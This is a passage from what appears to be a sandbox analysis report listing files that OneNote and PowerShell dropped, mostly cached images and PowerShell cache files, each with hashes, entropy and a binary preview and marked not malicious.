                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                                                            MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                                                            SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                                                            SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                                                            SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BH.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11197
                                                                                                                                            Entropy (8bit):7.975073010774664
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                                                            MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                                                            SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                                                            SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                                                            SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BJ.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19920
                                                                                                                                            Entropy (8bit):7.987696084459766
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                                                            MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                                                            SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                                                            SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                                                            SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BL.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):179460
                                                                                                                                            Entropy (8bit):7.979020171518325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                                                            MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                                                            SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                                                            SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                                                            SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BN.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):109698
                                                                                                                                            Entropy (8bit):7.954100577911302
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                                                            MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                                                            SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                                                            SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                                                            SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BP.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):41893
                                                                                                                                            Entropy (8bit):7.52654558351485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                            MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                            SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                            SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                            SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BS.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):68633
                                                                                                                                            Entropy (8bit):7.709776384921022
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                            MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                            SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                            SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                            SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BU.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59832
                                                                                                                                            Entropy (8bit):7.308211468398169
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                            MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                            SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                            SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                            SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000C0.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):53259
                                                                                                                                            Entropy (8bit):7.651662052139301
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                            MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                            SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                            SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                            SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5829
                                                                                                                                            Entropy (8bit):4.902247628650607
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                                                                                                                            MD5:F948233D40FE29A0FFB67F9BB2F050B5
                                                                                                                                            SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                                                                                                                            SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                                                                                                                            SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17208
                                                                                                                                            Entropy (8bit):5.556961149817849
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:0tWqKszi0V6AE4KzOuGUpDn0SjnBjCj5fpJ9VcSJepWyYwAY1:WUOw0odCFzcn51
                                                                                                                                            MD5:5969F3045CCD9F3AA912B4779EB1BBAA
                                                                                                                                            SHA1:46D09AFBE862D7614E0196B72A2019FA690D1FC9
                                                                                                                                            SHA-256:950F5008347BE76B6F8CC7E8A4BD9060782FD6BD54230B2B07504A42E6622577
                                                                                                                                            SHA-512:9F854207BEB921DCC08C488F5056F38BC4D69B7F5C430C77D78D1AD9938D2E016CBB310CFAF3B793CC136BDAFAD584EDE623E83492AEE05293C4BC784D5A0C35
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e.....................M..........................@..........H...............<@.^.L."My...:)..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)v.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                                            C:\Users\user\AppData\Local\Temp\OneNote Archive\Getting Started.one

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):362512
                                                                                                                                            Entropy (8bit):7.4865133330189195
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:8yHwh4AIZ5A1QM6vUbHCkCBVoqx5HUvFOAjNPySj8MTcrOQMhuNBSMl:gWZ5A10vUbikCBVoqx5wOuqSJTcOQMZE
                                                                                                                                            MD5:1B1F33ACFB7F60763EAE7387540CAAC6
                                                                                                                                            SHA1:FA265F2751B49B1D6C34044566452BEC719DBE6D
                                                                                                                                            SHA-256:F5790F5EC6C1CFAB26F006066E2E7713FC0C69BB7B25A246CEE8CEF5ED7EBE2E
                                                                                                                                            SHA-512:1A6CA07356820DE8073F2E94A9EAAA9D30C4CD3A4F353B6A8D3F679E2A1F80A1FE1625FED1FA5961944380A0EB50C847B6F296707EBF32C08C475EA4F29A0F9A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.R\{..M..Sx.).....b.G.J...k-.NO................?.....I.......*...*...*...*......................................................c.F.I.aq7...d(.x...........(~......................8.......0......................=.p.B..b. .Sw........@.....E..&.K..0............................U....7..U....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\OneNote Archive\Open Notebook.onetoc2

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5136
                                                                                                                                            Entropy (8bit):2.7659705568264648
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:YviYyfWma/uZe6B+meHviIklaW//Uc89wTT5mBmlthbXnuolaI0tAPQB4Qidl50i:BnO/uUPv4om1mAlthbXZjPQxygaceac3
                                                                                                                                            MD5:B88E32A0B6DF1DF926DAF79319DEDCAA
                                                                                                                                            SHA1:241AE4D0BC537715373CCD430049CF1A309ACA29
                                                                                                                                            SHA-256:7E07C0BE4A9AB405C4D2907851248E36E6D10059E2C50D9506AB7C035CFAB8C4
                                                                                                                                            SHA-512:7CDED2A450D0D941B206F5D7274F5F337B61EBA78497EC81D5E55486A7671CF5287C0EDBEFBCF5059CB8AEAD3B490B848ED73E28224C3C74EB74DC4547F293CD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:./.C..vL....W"v_...c.F.I.aq7..................?.....I...........................................................................................................................................................d9M....I.-3Llw}.........[_n.r..M.moC.d].............................r....7..r....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16384
                                                                                                                                            Entropy (8bit):0.32584346790067215
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:UPQXc/N+t+Wpys5UMclSqlPMclX/7EEIzvksXb+lh2RKUEZ+lX1MAx7vKlCXlvBl:UoHLys2xX/7Ehzv3b+6RKQ137v+uD
                                                                                                                                            MD5:AB0C7059009399CE9D2F19E2EBD01EF2
                                                                                                                                            SHA1:CCC9598618A10A530AA6993542A4C199EE15089B
                                                                                                                                            SHA-256:DBFC3E6BA5EC575D067446F809B6443EE6259EBD132EBD3BC93D9FD79F7E503F
                                                                                                                                            SHA-512:380BEF0C5C672DE360CC9FE93CF342E448294BF1FD949B1F69F025A3A694B09EFFA7A53F8DC115E2A70303BEEE4965BCBB1DE1A3EC33DC28FCDEA05D7DDC1437
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.@..`...........................................`........................................................@.......B..............Zb..........................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1...........................................................]...m..... ......Y.(C7..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1urcnh5z.kmv.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wsmzg4w.ts0.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{000FB4C2-87CA-4AF1-B6ED-4BF733D92218}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2268
                                                                                                                                            Entropy (8bit):7.384274251000273
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                                                            MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                                                            SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                                                            SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                                                            SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                                                            Malicious:false
